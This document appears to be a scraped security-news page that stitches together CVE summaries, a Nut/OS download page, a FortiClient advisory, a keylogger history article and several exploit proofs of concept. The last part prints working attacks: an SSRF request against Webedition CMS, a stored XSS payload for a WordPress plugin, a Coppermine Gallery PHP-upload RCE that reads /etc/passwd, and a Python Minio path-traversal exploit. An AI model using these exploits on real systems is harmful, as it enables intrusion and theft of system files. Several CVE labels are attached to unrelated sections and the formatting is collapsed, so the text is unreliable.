Windows Deployment Services Denial of Service Vulnerability

CVE-2023-36707

Windows Deployment Services Information Disclosure Vulnerability

CVE-2023-36706

Incomplete Cleanup vulnerability in Apache Tomcat.

The internal fork of Commons FileUpload packaged with Apache Tomcat 9.0.70 through 9.0.80 and 8.5.85 through 8.5.93 included an unreleased, 
in progress refactoring that exposed a potential denial of service on 
Windows if a web application opened a stream for an uploaded file but 
failed to close the stream. The file would never be deleted from disk 
creating the possibility of an eventual denial of service due to the 
disk being full.

Users are recommended to upgrade to version 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.



**Email display mode:**

Modern rendering  
Legacy rendering

CVE-2023-42794

An issue was discovered in Ethernut Nut/OS 5.1. The code that generates Initial Sequence Numbers (ISNs) for TCP connections derives the ISN from an insufficiently random source. As a result, an attacker may be able to determine the ISN of current and future TCP connections and either hijack existing ones or spoof future ones. While the ISN generator seems to adhere to RFC 793 (where a global 32-bit counter is incremented roughly every 4 microseconds), proper ISN generation should aim to follow at least the specifications outlined in RFC 6528.

**Nut/OS Downloads**

**Stable Version 5.1**

ethernut-5.1.0-1.exe  
Executable installation for Windows PCs.

ethernut-5.1.0-1.tar.gz  
Source code package for Linux and OS X. More details are available here.

**Latest Beta Version**

ethernut-5.2.4.exe  
Executable installation for Windows PCs.

ethernut-5.2.4.tar.gz  
Source code package for Linux and OS X. More details are available here.

**Code Repository**

The cutting edge development version is available in an Apache Subversion repository at ethernut.svn.sourceforge.net.

If you like to work locally with Git on the Subversion repository, get the bare repository at ethernut-code.git.tar.gz.  
Unpack the tar file with

tar fxz ethernut-code.git.tar.gz

change to the Ethernut code directory with

cd ethernut-code

and checkout the files

git checkout -- .

You can stay up to date with

git svn rebase

**Previous Releases**

Versions, which are no longer maintained, can be downloaded from the archive.

**Note! Binary code created from version 5.0.4 beta for Cortex-M may contain code with the following license:**

Copyright (c) 2005-2009 Luminary Micro, Inc.  All rights reserved.
Software License Agreement

Luminary Micro, Inc. (LMI) is supplying this software for use solely and
exclusively on LMI's microcontroller products.

The software is owned by LMI and/or its suppliers, and is protected under
applicable copyright laws.  All rights are reserved.  You may not combine
this software with "viral" open-source software in order to form a larger
program.  Any use in violation of the foregoing restrictions may subject
the user to criminal sanctions under applicable laws, as well as to civil
liability for the breach of the terms and conditions of this license.

**We have removed this version.**

**Toolchains****AVR 8-Bit Cross Development****Debian Packages**

packages.debian.org  
Debian official packages.

**Windows Installer**

WinAVR  
is a complete Win32 installation package, which contains the AVR-GCC compiler and many additional tools.

**AVR32 Cross Development**

AVR32 GNU Toolchain  
Atmel offers free development environments for PCs running Linux and Windows.

**ARM Cross Development****Debian Packages**

GNU binary utilities for arm-elf cross development  
This package is a collection of utilities required for the assembly, linking, symbol dumping, object dumping, object copying and other operations for position independent code on ARM targets using the ELF file format.

GNU C compiler for arm-elf cross development  
GNU C cross compiler for ARM targets using the ELF file format.

GNU debugger for arm-elf cross development  
GNU debugger, configured for remote debugging of ARM targets using the ELF file format.

Standard C library for arm-elf cross development  
This C library intended for use on ARM targets using the ELF file format. Newlib is a conglomeration of several library parts, all under free software licenses that make them easily usable on embedded products.

**Windows and Mac OS X**

YAGARTO  
is the recommended toolchain for 32-bit ARM targets.

**Ethernut 5 Specific**

en5flasher-20130719.zip  
Automagic Flasher for Ethernut 5, described on this page. This release of the Linux kernel 3.8.8 additionally contains the binary images of SAMBoot and U-Boot-2013.01.01.

ethernut5-image-20130604.zip  
Ethernut 5 root file system image for Linux 3.8.8, built with Yocto 1.4.

meta-egnite-20130531.tar.bz2  
build-ethernut5-3.8-20130531.tar.bz2  
Files needed to build Yocto for Ethernut 5.

en5pwrman-20110610.zip  
Power management firmware for Ethernut 5, mentioned at the end of this page.

**Previous Releases**

en5flasher-20120308.zip  
Automagic Flasher für Ethernut 5, described on this page. This first release of the Linux kernel 3.2.9 additionally contains the binary images of SAMBoot and U-Boot-2011.03.

console-image-ethernut5-20120308.zip  
First release of the Ethernut 5 Linux root file system image for kernel 3.2.9. Should be installed in conjunction with en5flasher-20120308.zip.

en5flasher-20120305.zip  
Automagic Flasher für Ethernut 5, described on this page. This second release for Linux 2.6.37 contains the binary images of SAMBoot, U-Boot-2011.03 and Linux kernel. The latter now supports USB memory sticks and cameras, PPP over UMTS/GPRS, GPS mice and more. The kernel now runs with data cache enabled.

console-image-ethernut5-20120305.zip  
Second release of the Ethernut 5 Linux root file system image. Should be installed in conjunction with en5flasher-20120305.zip.

egnite-oe-overlay-r2.tar.bz2  
egnite-oe-build-2.6.37-r2.tar.bz2  
OpenEmbedded overlays to build U-Boot, Linux and a root filesystem for Ethernut 5.

en5flasher-20110610.zip  
Automagic flasher for Ethernut 5, described this page.

console-image-ethernut5-20110525.zip  
Ethernut 5 Linux root file system image. Use this first version with en5flasher-20110610.zip.

CVE-2020-27213: Ethernut Download

An exposure of sensitive information to an unauthorized actor vulnerability [CWE-200] in FortiClient for Windows 7.2.0, 7.0 all versions, 6.4 all versions, 6.2 all versions, Linux 7.2.0, 7.0 all versions, 6.4 all versions, 6.2 all versions and Mac 7.2.0 through 7.2.1, 7.0 all versions, 6.4 all versions, 6.2 all versions, may allow a local authenticated attacker with no Administrative privileges to retrieve the list of files or folders excluded from malware scanning.

** PSIRT Advisories**

**FortiClient - Information disclosure of folders to exclude from scanning**

**Summary**

 An exposure of sensitive information to an unauthorized actor vulnerability \[CWE-200\] in FortiClient for Windows, Linux and Mac, may allow a local authenticated attacker with no Administrative privileges to retrieve the list of files or folders excluded from malware scanning.

Version

Affected

Solution

FortiClientMac 7.2

7.2.0 through 7.2.1

Upgrade to 7.2.2 or above

FortiClientMac 7.0

7.0 all versions

Migrate to a fixed release

FortiClientMac 6.4

6.4 all versions

Migrate to a fixed release

FortiClientMac 6.2

6.2 all versions

Migrate to a fixed release

FortiClientWindows 7.2

7.2.0

Upgrade to 7.2.1 or above

FortiClientWindows 7.0

7.0 all versions

Migrate to a fixed release

FortiClientWindows 6.4

6.4 all versions

Migrate to a fixed release

FortiClientWindows 6.2

6.2 all versions

Migrate to a fixed release

FortiClientLinux 7.2

7.2.0

Upgrade to 7.2.1 or above

FortiClientLinux 7.0

7.0 all versions

Migrate to a fixed release

FortiClientLinux 6.4

6.4 all versions

Migrate to a fixed release

FortiClientLinux 6.2

6.2 all versions

Migrate to a fixed release

Follow the recommended upgrade path using our tool at: https://docs.fortinet.com/upgrade-tool

**Acknowledgement**

Fortinet is pleased to thank Alwin Warringa from Ordina for reporting this vulnerability under responsible disclosure.

**Timeline**

2023-10-05: Initial publication

CVE-2023-37939: Fortiguard

Keyloggers have been used for espionage since the days of the typewriter, but today's threats are easier to get and use than ever.

Keyloggers, the often-unseen sentinels of the digital space, silently and meticulously document a user's every tap and keystroke with the objective of harvesting valuable information. While many consider them tools of the cyber elite, it's startling how readily available and easy to use they are today.

Let's explore their lineage, the different kinds that exist, their multiple (good and bad) purposes, and the pressing need for protective measures.

**Historical Keyloggers**

The concept of spying on communication isn't new. But the 1970s, characterized by the ideological tussle between the East and West, offered a unique twist. Soviet engineers developed the Selectric bug to spy on electric typewriters. This ingenious device both underscored the era's espionage intensity and foreshadowed future digital surveillance.

Fast forward to the 1990s, as the tech revolution was reshaping the world. Computers transitioned from huge rooms to desktops. With this, the keylogger evolved too, from tangible devices to sophisticated software programs. In a twist of irony and to acknowledge digital espionage threats, in 2013 the Russian embassies dusted off their old typewriters.

Today's world paints a complex canvas. While keyloggers have become tools to help agencies like the FBI capture criminals, they've also become the weapon of choice for digital pirates and hackers globally.

**Types of Keyloggers**

There are a host of hardware and software devices that can spy on computer keyboard input today.

*   **USB keyloggers:** It's a stark testimony that anyone can purchase a keylogger as easily as they can buy a book. Retailers such as Amazon list these devices camouflaged as innocuous USB drives. While they might seem harmless, they're digital Trojan horses. For example, in 2017 a university student was expelled for using such a hardware keylogger to change academic scores.
*   **Acoustic keyloggers:** Sound, an elemental form of communication, has been weaponized by acoustic keyloggers. Every key on a computer keyboard has a unique sound. By recording and analyzing these sounds, these keyloggers can recreate entire documents. Research labs at University of California, Berkeley, have demonstrated how over 96% of a document's content can be reconstructed from keystroke sounds.
*   **Electromagnetic keyloggers:** Advancing from sound to the electromagnetic spectrum, keyloggers can eavesdrop on keyboards' faint electromagnetic discharges. Finely calibrated receivers can intercept and decode these emissions, even through physical barriers.
*   **Smartphone-based keyloggers:** In this mobile-first era, the array of sensors on mobile phones offer a fertile ground for innovative keylogging methods. By manipulating sensors designed for motion detection, software can decipher typing habits. Reports have unveiled accuracy levels approaching 97% from using smartphone data alone.
*   **Software-based keyloggers:** The 1980s saw the rise of software-based keyloggers. Some were crafted with malicious objectives, while others, such as those embedded in Windows 10, aimed to amplify the user experience through enhanced predictive text abilities. However, the rise of artificial intelligence and voice-activated devices like Amazon's Alexa becoming household staples creates new concerns. Their "always listening" feature has become a contentious topic.

**Ethical Keyloggers**

While the term "keylogger" often conjures negative imagery, many are used for valid, ethical purposes. Examples include enhancing software user experiences, helping parents monitor their children's digital footprints, aiding IT professionals in diagnosing tech issues, and safeguarding communal tech platforms from inappropriate use.

YouTube's vast informational landscape caters to curious minds, offering guidance on myriad subjects, including creating software. These include keylogger tutorials touted for educational enrichment. While they empower and educate genuine learners, they simultaneously risk aiding malicious intent. This duality underscores the need for discerning content consumption and ethical application of knowledge.

**Counteracting the Keylogger Threat**

Knowledge and proactive defense are the watchwords for decreasing your risk of being a keylogger victim. Regularly updating software, using robust two-factor authentication, leveraging virtual keyboards, employing state-of-the-art anti-keylogger tools, and physical examinations can help ward off these digital spies.

From their humble beginnings as tools of geopolitical subterfuge to their current omnipresence in the digital era, keyloggers have charted a dramatic trajectory. As we hurtle into an increasingly digital future, the history of keyloggers serves as a stark reminder of the delicate balance between technology's boons and banes.

How Keyloggers Have Evolved From the Cold War to Today

Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

WordPress Sonaar Music plugin version 4.7 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Sonaar Music Plugin 4.7 - Stored XSS# Date: 2023-09-05# Exploit Author: Furkan Karaarslan# Category : Webapps# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php# Version: 4.7 (REQUIRED)# Tested on: Windows/Linux----------------------------------------------------------------------------------------------------1-First install sonar music plugin.2-Then come to the playlist add page. > http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist3-Press the Add new playlist button4-Put a random title on the page that opens and publish the page. > http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist5-This is the published page http://127.0.0.1/wp/wordpress/album_slug/test/6-Let's paste our xss payload in the comment section. Payload: <script>alert("XSS")</script>BingooRequest:POST /wp/wordpress/wp-comments-post.php HTTP/1.1Host: 127.0.0.1Content-Length: 155Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/wp/wordpress/album_slug/test/Accept-Encoding: gzip, deflateAccept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7Cookie: comment_author_email_52c14530c1f3bbfa6d982f304802224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26gt%3Balert%28%29; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f304802224a=hunter%7C1694109284%7CXGnjFgcc7FpgQkJrAwUv1kG8XaQu3RixUDyZJoRSB1W%7C16e2e3964e42d9e56edd7ab7e45b676094d0b9e0ab7fcec2e84549772e438ba9; wp-settings-time-1=1693936486Connection: closecomment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+g%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5

WordPress Sonaar Music 4.7 Cross Site Scripting

Coppermine Gallery version 1.6.25 remote code execution exploit.

    Exploit Title: coppermine-gallery 1.6.25 RCEApplication: coppermine-galleryVersion: v1.6.25  Bugs:  RCETechnology: PHPVendor URL: https://coppermine-gallery.net/Software Link: https://github.com/coppermine-gallery/cpg1.6.x/archive/refs/tags/v1.6.25.zipDate of found: 05.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================steps1.First of All create php file content as <?php echo system('cat /etc/passwd'); ?> and sequeze this file with zip.$ cat >> test.php <?php echo system('cat /etc/passwd'); ?>$ zip test.zip test.php1. Login to account2. Go to http://localhost/cpg1.6.x-1.6.25/pluginmgr.php3. Upload zip file4. Visit to php file   http://localhost/cpg1.6.x-1.6.25/plugins/test.phppoc requestPOST /cpg1.6.x-1.6.25/pluginmgr.php?op=upload HTTP/1.1Host: localhostContent-Length: 630Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryi1AopwPnBYPdzorFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/cpg1.6.x-1.6.25/pluginmgr.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cpg16x_data=YTo0OntzOjI6IklEIjtzOjMyOiI0MmE1Njk2NzhhOWE3YTU3ZTI2ZDgwYThlYjZkODQ4ZCI7czoyOiJhbSI7aToxO3M6NDoibGFuZyI7czo3OiJlbmdsaXNoIjtzOjM6ImxpdiI7YTowOnt9fQ%3D%3D; cpg16x_fav=YToxOntpOjA7aToxO30%3D; d4e0836e1827aa38008bc6feddf97eb4=93ffa260bd94973848c10e15e50b342cConnection: close------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="plugin"; filename="test.zip"Content-Type: application/zipPK�����™b%Wz½µ}(���(�����test.phpUT  �ñòödÓòödux���������<?php echo system('cat /etc/passwd');?>PK�����™b%Wz½µ}(���(������������¤����test.phpUT�ñòödux���������PK������N���j�����------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="form_token"50982f2e64a7bfa63dbd912a7fdb4e1e------WebKitFormBoundaryi1AopwPnBYPdzorFContent-Disposition: form-data; name="timestamp"1693905214------WebKitFormBoundaryi1AopwPnBYPdzorF--

Coppermine Gallery 1.6.25 Remote Code Execution

Minio version 2022-07-29T19-40-48Z suffers from a path traversal vulnerability.

    # Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal# Date: 2023-09-02# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) 2022-07-29T19-40-48Z# Tested on: Windows 10# CVE : CVE-2022-35919# Required before execution: pip install minio,requestsimport urllib.parseimport requests, json, re, datetime, argparsefrom minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class MyMinio():    secure = False    def __init__(self, base_url, access_key, secret_key):        self.credits = Credentials(            access_key=access_key,            secret_key=secret_key        )        if base_url.startswith('http://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'        elif base_url.startswith('https://') and base_url.endswith('/'):            self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd'            self.secure = True        else:            print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n')    def poc(self):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(self.url)        headers = {            'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method='POST',            url=urls,            region='',            headers=headers,            credentials=self.credits,            content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855',            date=datetimes,        )        if self.secure:            response = requests.post(url=self.url, headers=headers, verify=False)        else:            response = requests.post(url=self.url, headers=headers)        try:            message = json.loads(response.text)['Message']            pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)'            matches = re.findall(pattern, message)            if matches:                print('There is CVE-2022-35919 problem with the url!')                print('The contents of the /etc/passwd file are as follows:')                for match in matches:                    print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5],                                                        match[6]))            else:                print('There is no CVE-2022-35919 problem with the url!')                print('Here is the response message content:')                print(message)        except Exception as e:            print(                'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:')            print(response.text)if __name__ == '__main__':    parser = argparse.ArgumentParser()    parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    args = parser.parse_args()    minio = MyMinio(args.url, args.accesskey, args.secretkey)    minio.poc()

Tag

#windows